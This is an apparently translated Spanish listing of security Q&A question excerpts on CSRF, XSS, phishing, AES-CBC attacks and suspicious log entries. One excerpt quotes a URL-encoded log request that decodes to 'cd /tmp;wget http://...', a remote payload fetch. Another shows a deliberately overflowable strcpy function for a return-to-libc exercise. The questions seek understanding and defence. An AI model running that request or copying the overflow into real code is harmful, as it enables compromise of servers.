Preguntas con etiqueta 'attacks'

2
respuestas

¿Qué puede hacer un usuario para protegerse contra los ataques CSRF?

Si estoy navegando mientras estoy conectado a mi panel de hosting o enrutador o cualquier otra aplicación, existe la posibilidad de ser hackeado por un CSRF exploit. Por lo tanto, la pregunta aquí es acerca de la protección del usuario...
hecha 17.04.2016 - 17:15
1
respuesta

Factibilidad computacional de encontrar 'Buenos enlaces' con el siguiente formato

Recientemente me topé con esto y estoy comprobando aquí para ver si lo que estoy proponiendo es realmente viable y puede considerarse una violación de la privacidad. Por razones obvias, no estoy revelando el sitio web que exhibe esta propied...
hecha 24.09.2012 - 01:32
1
respuesta

Qué pasos deben seguirse para identificar el agujero de seguridad

Yo uso VPS hosting. Instale CentOS 6 y ZPanel de acuerdo con este tutorial enlace Se recibió una advertencia del proveedor de alojamiento: Esta URL se ha identificado como un sitio de phishing y actualmente está involucrada en actividades d...
hecha 23.10.2013 - 14:56
1
respuesta

¿Cómo podría funcionar este ataque?

Estaba explorando mis registros de apache y encontré la siguiente solicitud (que resultó en un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32...
hecha 26.03.2017 - 18:29
1
respuesta

¿Consecuencia de seguridad del agujero de Javascript en un chat en línea?

Para un chat en línea que permite HTML básico, ¿qué sucede si dejan una forma abierta para que un pirata informático potencial ejecute javascript en todas las personas que están en el chat? ¿Qué es lo peor que podrían hacer?     
hecha 01.06.2013 - 23:29
3
respuestas

¿Permitir que todos sepan cuándo se inició un proceso de servidor representa un riesgo para la seguridad?

Recientemente encontré que en Microsoft .NET framework un subproceso suplantado no tiene permiso para solicitar "la hora en que se inició el proceso actual". Esto podría hacerse intencionalmente o esto podría ser una deficiencia de implementació...
hecha 18.03.2013 - 09:17
1
respuesta

¿Pueden los ataques activos realmente descifrar un archivo encriptado AES-256, CBC, PKCS # 7 en particular?

Recientemente descubrí que los ataques activos son una amenaza contra AES-256, modo CBC, rellenado con PKCS # 7 (el modo CBC en particular. Supuestamente debería cambiar a EAX para protegerme de estos ataques). Sin embargo, estoy confundido a...
hecha 28.02.2013 - 19:22
2
respuestas

¿Es seguro usar una contraseña débil de Veracrypt?

¿Es seguro crear una partición de Veracrypt (en un USB) tal que ocupa todo el dispositivo (es decir, no un "archivo", pero utiliza el USB como el contenedor de almacenamiento) solo contiene un volumen estándar (no hay volumen oculto) uti...
hecha 25.04.2018 - 16:28
3
respuestas

Inserte una cadena en la memoria con un carácter nulo

Estoy intentando implementar return-to-libc, aquí está el código void func(const char *str) { char buf[4]; strcpy(buf,str); printf("you entered [%s]\n",buf); } int main(int argc, char *argv[]) { if(argc != 2) { printf...
hecha 24.09.2013 - 06:25
2
respuestas

Códigos de escape extraños en una solicitud GET: ¿se trata de un ataque conocido?

Recientemente encontré algunas entradas en los registros de acceso de nginx que se asemejan a las siguientes: ##.##.##.## - - [24/Sep/2014:01:21:51 -0400] "GET /767/browser-wars-side-show-ho w-natty-handles-the-load/+++++++++[+%C0%EA%F2%E8%E2%...
hecha 24.09.2014 - 05:32